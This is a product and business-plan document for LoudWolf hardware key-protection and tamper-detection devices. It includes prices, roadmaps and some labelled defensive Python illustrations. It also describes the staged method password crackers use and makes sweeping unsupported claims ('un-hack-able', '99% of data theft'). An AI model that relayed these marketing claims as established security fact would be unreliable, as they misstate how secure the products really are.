In our research we have noted that 99% of all data theft today uses the third option. Gaining access to the
encrypting computer is considered easy, just as easy as finding another target! There are hundreds of
known methods, with more being discovered every day. It has become trivial to tap in to any computer
system connected to the web and install a “key-logger,” effectively lifting off all the keys and passwords at
the source--in some cases even as they are typed.
In summary, encryption is always breakable. Better encryption takes longer to break, but it is always
breakable. The best encryption strives not to be unbreakable but to make the breaking uneconomical. All
encryption is worthless if the keys can be stolen.
Encryption using long keys is desirable provided that the computational power required to encrypt the data is
consistent with the volume of traffic and the expense involved. During our research into the delivery of
high-value intellectual property, we performed an in-depth analysis of all possible encryption techniques. Our
startling conclusion was that irrespective of the algorithm used and the length of the key, there is no current
security method to definitively protect high-value data. Since the threat generally lies in the security of the
key, the encryption algorithm itself is almost never an issue (unless it is intrinsically weak).
Security is strong when:
1/ The encryption algorithm is good.
2/ The key complexity and length are strong.
3/ The keys themselves are protected.
Most systems fall short in items 2 & 3 above. Many keys are trivial adaptations of dictionary words and as
such are little more than a “speed-bump” for hackers. Protection of keys is often an afterthought, and often
little is done to protect the key. It is vitally important to protect the key from the moment it is created and to
follow through on this protection for the life of the key.
When the cryptographic protection reaches the point of being good enough to make the cracking of the key
prohibitive, the data thief turns to an easier route, that of stealing the keys directly from the source.
“In over a decade of hacking it has never been necessary to break into crypto.
It is much, much easier to break into your system and steal your crypto keys.”
This point is fundamental. Protection of the keys is now the paramount problem facing the security industry,
not the encryption techniques used.
One can place a complex and expensive lock on one's house, but leaving the key under the doormat
invalidates its security potential.
Our technology not only protects these keys but also uses a proprietary technique to create and validate
them. Other aspects of our technology “fingerprint” the protected data by a close integration with the key
and verify the identity of both the sender and recipient. Our security solutions involve sophisticated software
tightly integrated with our unique “un-hack-able” hardware.
The hardware aspect of our technology is crucial to our dual goals of infallible and fail-safe security.
Although the actual physical hardware consists of a single silicon chip, its aspects can be broken down into
three distinct functions.
1/ Isolation Components
The hardware is capable of physically cutting off the communications ports of the computer, acting like a pair
of spring-loaded “scissors.” Each and every point of entry and exit is protected by these “scissors,” which
consist of a series of isolating switches placed in-line with the computer’s communications ports. The fail-safe
concept is implemented by means of so-called “watch-dog” software and hardware. Each of these switches is
designed to cut off the communications ports by default unless constantly reminded not to do so by the
watch-dog software and hardware.
2/ Watch-Dog Systems
Built into the chip is a self-diagnostic capability that constantly checks and re-checks itself, the host
computer, the software component of the watch-dog, and the integrity of the secure keys.
3/ Superkeys
Hybrid “superkeys” consist of multiple, independently derived sub-keys. This is consistent with implementing
the use of long keys, making brute force cracking of the data computationally infeasible.
Our technologies focus on the protection of the keys themselves. For details on password problems and
hacker methodology see the section following the superkeys diagram.
LoudWolf technology uses hardware-based key translation, elevating the protection of the keys themselves to
its correct position of ultimate importance. The “One-Time Code-Pad” is the ultimate in coding methods,
clearly unbreakable if used correctly (one time). This is the code that has been used by security service
operatives in the field for decades; their very lives depend on its security. Messages are encoded using a
sheet from a pad of random numbers, then decoded at the receiving end by an identical sheet. If the sheets
(or keys) are secure and the pad is only used once, then security is absolute. It relies on three essential
elements:
1/ The sender and receiver must, prior to communications, share a secret (the Code-Pads).
2/ The pads cannot be used more than once.
3/ The length of a message using one pad cannot be longer than the pad itself.
These aspects are all addressed in LoudWolf’s implementation of this concept as depicted below.
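The three essential elements above, enforced in a small one-time-pad model. This is an added illustration written for this page, not LoudWolf's code; the class name, the `used` flag and the random sheet generation are assumptions about how single use and pad length would be checked.

```python
import secrets


class OneTimePad:
    """One sheet of a code-pad: random bytes shared in advance by both parties.

    Constructed illustration (not LoudWolf's code). Each party holds its own
    identical copy of the sheet; the `used` flag enforces single use.
    """

    def __init__(self, sheet: bytes) -> None:
        self.sheet = sheet
        self.used = False

    @classmethod
    def generate(cls, length: int) -> "OneTimePad":
        # Element 1: the pad is truly random and must be shared before use.
        return cls(secrets.token_bytes(length))

    def apply(self, data: bytes) -> bytes:
        """XOR `data` with the sheet; encoding and decoding are the same step."""
        if self.used:
            # Element 2: a sheet is never used twice.
            raise RuntimeError("this sheet has already been used")
        if len(data) > len(self.sheet):
            # Element 3: the message can be no longer than the pad.
            raise ValueError("message is longer than the pad")
        self.used = True
        return bytes(d ^ k for d, k in zip(data, self.sheet))


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def exchange(sheet: bytes, message: bytes) -> bytes:
    """Sender and receiver each consume their own copy of the same sheet."""
    sender = OneTimePad(sheet)
    receiver = OneTimePad(sheet)
    ciphertext = sender.apply(message)
    return receiver.apply(ciphertext)


def reuse_leaks(sheet: bytes, m1: bytes, m2: bytes) -> bool:
    """Why element 2 is absolute: if one sheet covers two messages, XORing the
    two ciphertexts cancels the pad and exposes m1 XOR m2 without any key."""
    c1 = xor_bytes(m1, sheet)
    c2 = xor_bytes(m2, sheet)
    return xor_bytes(c1, c2) == xor_bytes(m1, m2)


if __name__ == "__main__":
    sheet = OneTimePad.generate(32).sheet
    print(exchange(sheet, b"meet at dawn"))  # round-trips to the plaintext
```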
Diagram: Implementation of a hardware-encoded session key.
Why the Keys are so Important
We routinely use passwords or keys to access our computers, e-mail, bank accounts, debit cards, etc. We are
usually cautioned when we create these passwords to make them hard to guess. When the password is a
cryptographic key to valuable data it should be made very difficult to guess. However, when the “guesser” is
a sophisticated program running on a powerful computer, “difficult” often becomes trivial.
Any password that consists of real words, either singly or in combination, presents a trivial problem for a
potential attacker. The so-called “dictionary attack” uses a “dictionary” in the form of a text file containing
words, commonly-used slang, numerical constants, names, dates, keyboard patterns, etc. These lists
have been refined over the years, and are very effective indeed at cracking most commonly used passwords.
Experts advise users to substitute numbers instead of letters, drop vowels out of real words and add symbols
to make passwords more difficult to crack. In response, the dictionary attack programs have become more
sophisticated and anticipate these tactics.
Anatomy of a Key-Breaker or Password Cracker Program
A typical automated password guessing program will, more or less, follow this sequence.
The “Dictionary Attack”
Single word dictionary attack (native language), using a dictionary of all real words, first and last names plus
slang words.
This dictionary is organized specifically to try the most commonly used words first, e.g. blank, PASSWORD,
ADMINISTRATOR, ADMIN, PSSWRD, TEST, GUEST, and so on.
Combination Word Attack
As above, but using a combination of two or more words.
Multiple Language Variant
All of the above, but expanding the dictionaries used to include all possible languages.
Number Substitution
All of the above but including the common practice of substituting certain numbers in place of letters. (1=I)
(0=O) (5=S) also adding numbers to the ends of words such as ADMIN12 etc.
The Brute Force Attack
Systematic attack on all combinations (letters only)
Systematic attack on all combinations (letters and numbers)
Systematic attack on all combinations (letters, numbers and symbols)
Systematic attack on all combinations (all possible codes)
By following the above sequence, the attacker can drastically reduce the amount of time and expense required
to crack a password. Naturally, the longer the password, the more combinations there are to try. Nevertheless,
eventually, all keys will succumb to this attack. The sequence followed above exploits the natural human
tendency to use words and numbers that can easily be remembered. It is easier to remember “FLYINGTIGER12”
than “%23gJ0-Jty&18H”, but although these keys are of identical length, the former will crack in
seconds, the latter will take orders of magnitude longer.
The tools of the trade for the hacker community are many; in the area of password cracking the tools are
too numerous to catalog, but a couple worthy of mention are John the Ripper and L0phtCrack.
As the sophistication of the attack tools grows, the need to increase the complexity of keys increases
commensurately. Thus security experts are now recommending using at least 12 characters and ensuring
that this combination of characters has no predictable pattern. This is good advice. However, it does not
prevent the system from being compromised by the brute force attack. The net effect of using an effective
password or key is to bring the security of the key up to its full potential.
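Seen from the defender's side, the same sequence becomes a password policy check: a candidate key is walked through the dictionary, combination and number-substitution stages, and only if it survives them is the brute-force keyspace counted. This is an added example, not LoudWolf's code; the word list is a constructed stand-in for the attacker's dictionaries, and the class sizes (26/26/10/33) are an assumption about printable ASCII.

```python
import math
import string

# Constructed mini word list standing in for the attacker's dictionaries the text
# describes (real words, names, slang and common defaults). Not LoudWolf code.
DICTIONARY = frozenset({
    "", "password", "administrator", "admin", "psswrd", "test", "guest",
    "flying", "tiger", "dragon", "letmein", "welcome", "summer", "john",
})

# The substitutions the text names (1=I, 0=O, 5=S), undone before matching.
DESUBSTITUTE = str.maketrans({"1": "i", "0": "o", "5": "s"})


def is_word_combination(candidate: str) -> bool:
    """Combination Word Attack: does the candidate split into two dictionary words?"""
    return any(
        candidate[:i] in DICTIONARY and candidate[i:] in DICTIONARY
        for i in range(1, len(candidate))
    )


def normalise(candidate: str) -> str:
    """Number Substitution: drop trailing digits (ADMIN12) and undo 1=I, 0=O, 5=S."""
    return candidate.rstrip(string.digits).translate(DESUBSTITUTE)


def brute_force_bits(password: str) -> float:
    """Brute Force stage: log2 of the keyspace an all-combinations search must
    cover, sized by the character classes actually present in the password."""
    alphabet = 0
    if any(c in string.ascii_lowercase for c in password):
        alphabet += 26
    if any(c in string.ascii_uppercase for c in password):
        alphabet += 26
    if any(c in string.digits for c in password):
        alphabet += 10
    if any(c not in string.ascii_letters + string.digits for c in password):
        alphabet += 33  # printable ASCII symbols and space (assumed class size)
    return len(password) * math.log2(alphabet)


def assess(password: str) -> dict:
    """Walk the cracker's sequence as a defender: report the first stage at
    which the password falls, or the brute-force work if none applies."""
    p = password.lower()
    if p in DICTIONARY:
        return {"stage": "single word", "bits": 0.0}
    if is_word_combination(p):
        return {"stage": "word combination", "bits": 0.0}
    n = normalise(p)
    if n != p and (n in DICTIONARY or is_word_combination(n)):
        return {"stage": "number substitution", "bits": 0.0}
    return {"stage": "brute force only",
            "bits": round(brute_force_bits(password), 1)}


if __name__ == "__main__":
    for candidate in ("PASSWORD", "TigerDragon", "FLYINGTIGER12", "%23gJ0-Jty&18H"):
        print(candidate, assess(candidate))
```

For the two keys compared in the text, FLYINGTIGER12 falls at the number-substitution stage (trailing digits stripped, then two dictionary words), while %23gJ0-Jty&18H survives every list and leaves only a 95^14 search, about 92 bits.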
Components of the Super-Keys Product
LoudWolf ensures that the keys are long, truly random and scrambled in hardware thus enabling the security
provided by encryption to reach its true potential which is “computationally infeasible” to crack. (Not
impossible but it would require an impossibly large number of impossibly fast computers to work on the
problem for an impossibly long period of time.)
The true potential of high-quality encryption is seldom realized. The sad reality is that key stealing is trivial by
comparison. Prevention of key stealing becomes of critical importance.
LoudWolf technology addresses each of these security issues.
1. The key length is maximized commensurate with the volume of traffic and computation power
available.
2. The keys are created in such a way so that the only possible attack would be a brute force all
combination attack.
3. The keys are created in such a way that neither the user of the computer nor the intended
recipient of the data knows the key.
4. The keys are dynamically integrated with the data itself in such a way as to provide multiple keys
per transmission.
5. Keys are generated in part by verification of the identities of the sending and receiving computers
through the use of persistent and semi-persistent variables, incorporating within the key historically
shared secret techniques.
6. The keys are integrated and inextricably linked to hardware devices incorporated into the
technology which are not programmable or changeable in any way.
7. The keys are further protected by an additional hardware device designed to detect any
unauthorized access to either the transmitting or receiving device and respond instantly to any
attacks by the immediate isolation of the computer’s communication devices and the destruction
of the key.
8. The LoudWolf goal is nothing less than making it impossible to guess, derive or steal the data
encryption keys in any way whatsoever thus realizing the full potential of the encryption
technique used.
9. Depending on the product, we also use the hardware isolation technique to physically prevent
data theft, raising the security level to unprecedented heights.
Using the latest encryption techniques alongside LoudWolf’s technology brings protection systems up to
their full potential. At present the use of high level encryption is almost universally undermined by the
appallingly low security pertaining to the keys used to encrypt and decrypt the protected property.
It is the weak link in the security chain and strengthening this link presents to the attacker the formidable
problem of keys that are computationally infeasible to break and impossible to steal!
LoudWolf addresses this problem by the use of sophisticated techniques to generate keys and protect against
password stealing. When these techniques are implemented effectively, they serve to eliminate password
stealing and realize the full potential of any security schema.
Key Length and Complexity Issues
Modern secure data communication relies on two fundamental concepts, namely key length and key security.
Key length is generally expressed as a number between 64 and 4096. This number refers to the number of
bits (1s or 0s) that make up the key or password that is used to encode and decode the secure
communication. This number can be used as a rough guide to the degree of difficulty a potential attacker
would experience in an attempt to decode the communication by utilizing a password cracking program to
systematically try every possible key combination, in other words unlocking the communication by trying
every possible key.
Clearly, the more complex the key, the more difficult and time-consuming the systematic key guessing
approach will become. A considerable amount of computational power is needed to use this “Brute Force”
approach. Nevertheless, such computer power is available, at a price, so security based upon encryption,
irrespective of the key length, should never be considered totally secure.
So-called “Standard” encryption systems commonly use 64, 128 and 256 bit keys.
The brute force approach will, on average, hit upon the correct key after half the possible keys have been
tried. One might ask why much larger key lengths are not commonly used. To understand the reason for
this we must delve a little deeper into the process of encryption and decryption. For our purposes we will
describe a simple encryption system using a single key; it should be noted, however, that a slightly more
complex system using a public and private key pair is now the norm.
- Key part one - LoudWolf generated
- Key part two - Local customer keys
- Key part three - STEEL generated key
- Key part four - Rixa IP consumer zero knowledge previously shared secret
- Key part five - LoudWolf zero knowledge previously shared secret
- Key part six - random variable as previous secret
Variables as Key Components
The “Previously Shared Secret” which is incorporated into the SuperKey hardware is a crucial part
of the overall system. However, to get the most out of the SuperKey system, and to deal with instances
where communications may be to machines that do not have the LoudWolf hardware, we make use
of persistent variables. We class these variables into three groups dependent on their length of
persistence or expectancy of accuracy. When two systems communicate they each query these
variables randomly, building over time a “Shared Secret history” between the two systems and thus
developing a machine-to-machine “knowledge” or familiarity between the systems: in effect, a shared
history. In secure communications a failure to correctly respond to a variable query will instantly
break the trust relationship and disallow the transfer.
For example, system A requests a secure file; system B requests that system A respond to a variable
query session before it will allow the transfer. B then randomly selects a dozen or so variables and
asks A to deliver the values. Since B has previously recorded the correct answers, B knows in
advance what the correct answers should be. If A responds correctly then B can be sure that A is
indeed who it says it is. In this manner we enable both machines to trust the identities of each
other. In effect the machines get to know each other and will flag a problem if they suspect a
machine is an impostor, all without either of the two operators of A or B being aware of the
relationship.
The LoudWolf hardware protects the encryption keys, the variables ensure the machine ID, and the
user needs only to identify himself to enable an unprecedented level of security.
Variable classes: Persistent Variables | Semi Persistent Variables | Instant Variables
Variables queried:
- Processor serial numbers
- Software version numbers
- User Name
- Passwords
- Hardware interface cards
- Video Card type
- Processor type
- Stepping Level
- Update
- Previous session key values
- Op system Major version
- Op system Minor version
- Op system patch level
- Mac Address
- IP Address
- Cache size
- Previous history file
- Ram Size
- AVG Page File size
- Local Time Zone
- Clock difference from GMT
- Clock drift rate over time
- Cookie values
- Average number of hours in use
- Last downloaded file name
- Last saved file
- Last logon time
- Last user name used
- Last logoff time
- Average logon time
- Ping Delay average
- Language settings
- Fonts available
- Cache page hits
- User Settings
- Current fan speed
- Current 12 volt supply voltage
- Current processor voltage
- Current 5 Volt supply voltage
- number of processor threads
- Time now
- Current user name
- Ping Now delay
- GMT Time Delta
- Stack size
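The variable query session between system A and system B, as an added model that is not LoudWolf's code: B samples a dozen variable names from its recorded history, A answers from its live values, and one wrong answer breaks the trust relationship. The variable names follow the table above; the recorded values, the `Verifier`/`Prover` names and the constant-time comparison are assumptions.

```python
import hmac
import random

# Constructed fingerprint of system A as previously recorded by system B (its
# "Shared Secret history"). The names come from the variable table; the values
# are made up for this illustration.
RECORDED_A = {
    "Processor serial numbers": "0000-0BAD-CAFE-1234",
    "Mac Address": "00-11-22-33-44-55",
    "Op system Major version": "5",
    "Op system Minor version": "1",
    "Op system patch level": "SP1",
    "Video Card type": "NV-ACME-64",
    "Ram Size": "512",
    "Local Time Zone": "PST",
    "Language settings": "en-US",
    "Fonts available": "143",
    "Processor type": "x86 Family 15",
    "Stepping Level": "7",
    "Cache size": "512",
    "Previous session key values": "a1b2c3",
}


class Verifier:
    """System B: holds what it has learned about A and issues the variable query."""

    def __init__(self, history: dict, rng: random.Random) -> None:
        self.history = dict(history)
        self.rng = rng

    def challenge(self, count: int = 12) -> list:
        # A random dozen or so variables, so an impostor cannot rehearse a fixed set.
        return self.rng.sample(sorted(self.history), k=min(count, len(self.history)))

    def verify(self, names: list, answers: dict) -> bool:
        # Every answer is checked (no early exit); one wrong value breaks trust.
        ok = True
        for name in names:
            expected = self.history[name].encode()
            given = str(answers.get(name, "")).encode()
            ok &= hmac.compare_digest(expected, given)
        return ok

    def learn(self, name: str, value: str) -> None:
        # After a trusted session the shared history grows by one more variable.
        self.history[name] = value


class Prover:
    """System A: answers the query from its own live values."""

    def __init__(self, variables: dict) -> None:
        self.variables = variables

    def respond(self, names: list) -> dict:
        return {n: self.variables.get(n, "") for n in names}


def request_transfer(verifier: Verifier, prover: Prover) -> bool:
    """A asks for a secure file; B runs the variable query session first and
    allows the transfer only when every answer matches its recorded history."""
    names = verifier.challenge()
    return verifier.verify(names, prover.respond(names))


def demo(seed: int = 7) -> dict:
    """The genuine A passes; a clone that differs in three variables cannot
    pass any 12-of-14 query; afterwards B records one more variable about A."""
    b = Verifier(RECORDED_A, random.Random(seed))
    genuine = request_transfer(b, Prover(RECORDED_A))
    clone = dict(RECORDED_A)
    clone.update({"Mac Address": "66-77-88-99-AA-BB",
                  "Processor serial numbers": "FFFF-0000-FFFF-0000",
                  "Ram Size": "1024"})
    impostor = request_transfer(b, Prover(clone))
    b.learn("IP Address", "10.0.0.5")
    return {"genuine": genuine, "impostor": impostor, "known": len(b.history)}


if __name__ == "__main__":
    print(demo())
```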
Super-Keys Product sample application
Secure Satellite or Terrestrial Up / Down-Link Technology
Retail Target Price
Range of approx. $20,000.00 - $200,000.00 dependent upon options selected.
Cost of Goods
Approximately $20.00 - $10,000.00 dependent upon options ($20.00 is the COG for a software-only solution).
Estimated Market
Industrial, commercial and certain military users of any form of wireless data transmission including, but not
limited to, X, K and Ku band satellite data (both up-link and down-link); all forms of radio and microwave
terrestrial data transmission links, including line-of-sight, ionospheric, tropospheric and ground wave
propagation; also including 802.11x formats, all 2.4 GHz formats, Bluetooth, PCS, Wi-Fi, etc.
These wireless links range from satellite communications (weather, geological, research, surveillance,
military, early warning, spy (KH series), etc.) on the high end to local wireless “Bluetooth” connections
between cell phones and PDAs on the low end. Our products address the inherent vulnerability of all wireless
transmissions, namely interception of the signal en route between transmitter and receiver stations. While
this capability is assumed, our product focuses on the encryption and validation aspects of the data
transmission.
We have identified markets in the following areas.
Entertainment: Satellite delivery of 1st run movies to “Cini-Plex” theaters equipped with download dishes
(microwave or Ku band satellite), receiving and storing high definition movies for later replay, for use in highly
flexible scheduling of movie viewing in multi-screen theaters.
Corporate communications: With the growing popularity of Wireless Local Area Networks on corporate
campuses there has arisen a security gap. Security policies which were considered adequate for the wired
network are proving themselves unable to protect the wireless hybrid networks of today.
Technical Overview
This product is based upon a flexible combination of our military-grade SuperKey technology and various
hardware components drawn from our Sentinel and other industrial / military sensor products, either licensed
and installed during manufacture, or purchased as an add-on product to an existing desktop installation.
The Sentinel Series
The LoudWolf products dubbed “Sentinel” are part of an overall product deployment strategy. The core
strategy is to produce a steady growth in revenues by a controlled deployment of linked and crossover
products to a wide range of consumers. The concept is not that of an upgrade, it is more of a two-tier
approach. While the STEEL products make inroads into the military, government and industry products, the
Sentinel begins with the commercial market and ranges down to the average consumer and up towards the
STEEL area.
Many of our technologies and hardware components are incorporated in the whole spectrum of products
since, after all, the threats are universal. The Pro Hacker often does not know what lies behind a randomly
selected IP address until he breaks into it, perhaps to find my wife’s shopping list or the NORAD battle plans.
The attack methodology is the same and so, to a greater or lesser degree, the principles of defense are also
similar.
The Sentinel Sharp
The Sentinel Sharp is an LCD screen about four and a half inches across, shown here in its “Crystal” case.
(Crystal is the code name for our totally transparent, technology demonstration and development system.)
The LCD is not only the display but also the user interface. It incorporates a touch screen, which enables the
Sentinel Sharp to be configured and controlled by the local user. Behind the screen lie dual microprocessors,
memory, and interface chips. It is incorporated along with the base Sentinel into several of our products
including some of the STEEL server models. Think of it as a separate computer, complete with keyboard,
video screen, memory and all the trimmings in a 1-inch flat pack. Its sole purpose: to monitor and control the
security of your main computer system. Think of it as a computer and you will get the idea of how useful
such a system could be as a security firewall and watchdog. It differs from any computer you have seen: no
software, no hacking. There is of course a program running inside the Sentinel Sharp, but it is entirely
self-contained within the hardware chips. These are one-time programmed by LoudWolf.
You may be aware of the term “Firm-Ware” as it refers to chip-based programs. In the Sentinel, this term
needs to be modified. After programming at the LoudWolf factory the chip is physically disabled from being
re-programmed. Perhaps we need a new moniker, “Extremely Firm-Ware,” almost indistinguishable from
hardware.
Sentinel Product description
Retail Target Price
Approximately $190.00
Cost of Goods
Approximately $25.00
Estimated Market
5-10 % of computer installed base
Technical Overview
Product is available in two (2) distinct versions, Sentinel Gold and Sentinel Platinum (Gold being a subset of
functionality of Platinum).
Sentinel Detail:
This product has two elements: a hardware element consisting of a device connected to the user’s computer
by means of the legacy parallel printer port (note: since the advent of USB as the standard printer interface,
this port remains largely unused on most computers). The core element of the Sentinel hardware is a
micro-controller. This is a single-chip computer that can be factory programmed only once; therefore it is
invulnerable to hacker modification. The Sentinel device has connectors for eight (8) add-on units (primarily
our own blocker devices, as well as our modified HDD); however, we will grant 3rd party manufacturers
access to interface specifications so they may develop other security related devices which can then be easily
integrated into our Sentinel. The Sentinel’s PIC micro-controller includes a “watchdog” timer that triggers a
signal at regular intervals. This signal inhibits the alert function in Sentinel’s alarm system. Any failure of the
watchdog timer (i.e. hardware failure, software error, add-on blocker alarm signal) will, by default, trigger
Sentinel’s alert function. Each of the 8 inputs can be connected to other devices in two separate ways.
Either the signal is an alarm signal from a sensor device (an input), or this signal can act as an automatic
cut-off command to an external protection device (output). The Sentinel therefore acts as a command and
control hub for various other products, as well as functioning as a standalone security device.
Sentinel Standalone Functionality
The Sentinel works in conjunction with the ‘Sentinel Avenger’ software to provide security functions.
1. Generation and matching of a unique ID code to “marry” the Sentinel and the computer. This is performed by
generating a signature derived from a random selection of components in a computer. The large number of
unique characteristics in any given computer ensures that this signature will be unique. Similarly, the Sentinel
generates its own unique identifier from a combination of its preprogrammed serial number and a random
number produced by a tunnel diode selected for its quantum noise characteristics.
2. The unique signature described above enables the Sentinel to act as a key, and in conjunction with the
Sentinel Avenger software, prevents any unauthorized use of the computer, furthermore enabling an
additional layer of security via data encryption.
3. In a similar manner to the hardware watchdog, the Sentinel monitors a signal generated by the Sentinel
Avenger software. The software constantly verifies its own integrity, which in turn (see description below)
verifies the integrity of the system software. The software must keep generating this signal to prevent the
alarm from firing automatically (fail safe); by doing so it confirms that both the hardware and software
elements are in perfect order and protection is active. Sentinel performs an algorithmic operation on all
critical system files, generating a ‘hash value’. This hash value is stored on the Sentinel’s on-board EEPROM
(Electrically Erasable Programmable Read-Only Memory). Note that this operation cannot be performed
remotely and, as a security feature, can only be modified by physically toggling a switch on the Sentinel. The
Sentinel Avenger software, using its own complementary signature, periodically generates a hash value of
every protected system file. This hash value is transmitted to the Sentinel; any inconsistency would indicate
an illicit alteration of a system file and generate an alarm response.
4. By using the parallel port as its access to the computer, the Sentinel also acts as a ‘Blocker’, but for the
parallel port. Note that the parallel port is used by a certain subset of hacker ‘Mal-Ware’ as an access point for
many novel exploits involving the ‘printer spooler’ software.
The Sentinel Platinum reproduces the parallel port, enabling standard parallel port operation. Sentinel
Platinum also has the unique feature of being compatible with our modified HDD (Hot ROD), using another port
to manually shut down both the protected and unprotected segments of the drive in case of alarm. This
feature offers the customer relief in knowing that their data will be completely secure.
Working Title (Hot ROD) Read Only Drive
Retail Target Price
Range of approx. $150.00 - $300.00 dependent upon storage capacity.
Cost of Goods
Approximately $60.00 - $130.00 dependent on storage capacity.
Estimated Market
All desktop computers worldwide.
Technical Overview
This product is either licensed and installed during manufacture, or purchased as an add-on product to an
existing desktop installation. The product consists of two components: hardware and software.
Hardware
Our engineers will modify the hard disk drive (HDD) at the point of manufacture. This modification varies
from drive to drive, but consists of two passive switches: The first switch selects the amount of HDD space to
be made read-only, specified in 2 GB increments. The second switch enables or disables the read-only
property.
Software
The software component of the product consists of a service. This service runs constantly, verifying
byte-for-byte the integrity and originality of all files resident in both the protected and unprotected areas of
the drive. This comparison process triggers an alarm and/or remedy procedure upon detection of a discrepancy
between the read-only reference file and the corresponding file on the HDD.
Current Windows systems have a similar all-software system for software integrity; it is known to be routinely
compromised by current state-of-the-art hacker software that modifies the system files as well as the
verification files, thus preventing detection (no security).
The software is initially set up in read/write mode to create the master copies of all original system files;
thereafter that portion of the drive is switched to read only. Because it is a hardware switch, it cannot be
compromised by anything less than physical possession of the hardware. The service utilizes a small portion
of the processing power to continuously cycle through the protected files ensuring absolute integrity. The
system triggers an alarm/repair response when a changed file is detected. The frequency of these checks will
depend on the number of system files the user chooses to protect, the speed of the computer and the
percentage of system resources allocated to the service. Therefore, an alarm response will be triggered, on
average, within 50% of the entire cycle time. (Not immediately upon the hacking event.)
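The hash check of the Sentinel (item 3 above) and the Hot ROD verification service just described share one mechanism: a reference set written only with an operator physically present, a live re-hash compared against it, and a watchdog that alarms by default when the clean heartbeat stops. The model below is an added illustration, not Sentinel Avenger or Hot ROD code; the file contents are constructed, SHA-256 is an assumption (the page only says "an algorithmic operation"), and the `Sentinel` class and its method names are invented for the example.

```python
import hashlib

# Constructed stand-in for the protected files (path -> contents). A real service
# would read the reference copies from the read-only area and the live copies from
# the writable drive; here both are dicts so the example runs offline.
REFERENCE_FILES = {
    "C:/WINDOWS/system32/kernel32.dll": b"kernel32 contents (constructed)",
    "C:/WINDOWS/system32/spoolsv.exe": b"print spooler contents (constructed)",
    "C:/WINDOWS/system32/drivers/etc/hosts": b"127.0.0.1 localhost\n",
}


def hash_files(files: dict) -> dict:
    """Software side: hash every protected file, byte for byte (SHA-256 assumed)."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in files.items()}


class Sentinel:
    """Model of the hardware side: reference hashes held in EEPROM, a physical
    switch that gates baseline writes, and a watchdog that alarms by default."""

    def __init__(self, heartbeat_period: float) -> None:
        self.reference = {}
        self.switch_closed = False      # physically toggled; never settable remotely
        self.heartbeat_period = heartbeat_period
        self.last_good_heartbeat = None
        self.alarm = None               # reason string once the alarm has fired

    def store_baseline(self, hashes: dict) -> None:
        if not self.switch_closed:
            raise PermissionError("baseline writes require the physical switch")
        self.reference = dict(hashes)

    def heartbeat(self, reported: dict, now: float) -> bool:
        """The software reports current hashes; any mismatch fires the alarm.
        Only a fully clean report counts as a watchdog kick."""
        for path, digest in self.reference.items():
            if reported.get(path) != digest:
                self.alarm = f"modified or missing: {path}"
                return False
        self.last_good_heartbeat = now
        return True

    def tick(self, now: float) -> bool:
        """Watchdog: with no clean heartbeat inside the period the alarm fires on
        its own (fail safe), so a killed or silenced service is caught as well."""
        if self.alarm is None:
            if (self.last_good_heartbeat is None
                    or now - self.last_good_heartbeat > self.heartbeat_period):
                self.alarm = "watchdog timeout"
        return self.alarm is not None


def provisioned_sentinel(baseline: dict, period: float = 10) -> Sentinel:
    """Baseline written with an operator at the machine, then the switch opened."""
    s = Sentinel(heartbeat_period=period)
    s.switch_closed = True
    s.store_baseline(baseline)
    s.switch_closed = False
    return s


def run_scenarios() -> dict:
    """Three runs: clean operation, a patched system file, a silenced service.
    Detection of a patched file waits for the next hash cycle, which is why the
    text quotes an average delay of half the cycle time."""
    baseline = hash_files(REFERENCE_FILES)

    clean = provisioned_sentinel(baseline)
    clean_ok = clean.heartbeat(hash_files(REFERENCE_FILES), now=0) and not clean.tick(5)

    tampered = provisioned_sentinel(baseline)
    live = dict(REFERENCE_FILES)
    live["C:/WINDOWS/system32/kernel32.dll"] = b"kernel32 contents (patched)"
    tamper_reported_clean = tampered.heartbeat(hash_files(live), now=0)

    silent = provisioned_sentinel(baseline)
    silent.heartbeat(baseline, now=0)
    silent_before = silent.tick(9)      # still inside the period: no alarm
    silent_after = silent.tick(11)      # no kick for 11 s: alarm by default

    return {
        "clean": clean_ok,
        "tamper_reported_clean": tamper_reported_clean,
        "tamper_alarm": tampered.alarm,
        "silent_before": silent_before,
        "silent_after": silent_after,
        "silent_alarm": silent.alarm,
    }


if __name__ == "__main__":
    print(run_scenarios())
```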
Designated File Protection
The software can enable the placement of files in the protected area making it impossible for them to be
changed. For designated user files, it is not possible to change them, and furthermore, the system provides
an instant alarm on the very first attempt to write to the protected area. These files, unlike those described
above, are completely protected from modification and raise an instant alarm on any modification attempt.
The user can place any file in this area, including, but not limited to, critical Windows system files (subject to
the dual conditions of 1. user designation of file location and 2. the file not being dynamically associated with
an unprotected file).
Note
This product does not prevent the reading of any file, but ensures the integrity of designated user files and
more importantly, serves as a trip-wire detection system for an entire class of hacking techniques which rely
upon subtle modifications of Windows system files. This class of attack upon Windows system files is a
cornerstone of the current suite of hacker technologies. When used in conjunction with other security
products (LW or other), this technique forms a powerful, multi-layered security ensemble. At this juncture,
we only plan support for Windows-based systems.
High Value Intellectual Property Disk Drive (HVIP-Drive)
This product is both a “Stand-Alone” OEM drive sold to computer manufacturers and is
also incorporated into the Rixa-STEEL-XA system.
High-Value Intellectual Property Drive (HVIP-Drive) is a custom hard-drive
manufactured for us by a leading hard-disc manufacturer. When delivered to us,
there is a safety pin, a device preventing activation of the chemical release
system. Upon installation in a Rixa STEEL server, the safety device is removed,
thus (a) enabling the intellectual property to be written to the hard-drive and (b)
activating the fail-safe chemical erasure system. The hard-drive from this
moment must remain powered on indefinitely. Loss of power or any breach of
the hard-drive case will result in the activation of the chemical erasure system
and complete, irretrievable data erasure.
Business Plan Implementation
Overview
Given the relative economy and large potential of the high end military systems and the clear advantage that LoudWolf would enjoy, having high profile military reference customers, it is anticipated that apart from some technology licensing deals, we will see initial early revenues primarily derived from our military and industrial sales. LoudWolf has already identified the existence of a strong market demand in this area. Therefore, in summary form, our main development goals are as follows:
• Refine military product definition.
• Review scientific data for short term outsourced or licensing possibilities.
• Deliver completed revenue-generation plan.
• Develop Rixa STEEL software, hardware in-house development testing mule.
• Develop modular sensor array packages.
• Reliability and effectiveness testing.
• Finalize production configuration.
• Develop bill of materials and outsource quotes.
• Develop demonstration and sales traveling mule.
• Produce limited quantity of crystal demonstration units for sales.
• Establish international licensing program.
• Commission Far-East mass-production.
• Establish deployment service and support operations center.
• Establish quality and product improvement feedback cycle.
Implementation Time Lines
Month 1:
• Establish sales/marketing operations center in London.
• Begin sourcing programming staff and hardware engineering in the U.S.
• Initiate contacts for production factories Far-East
Month 2:
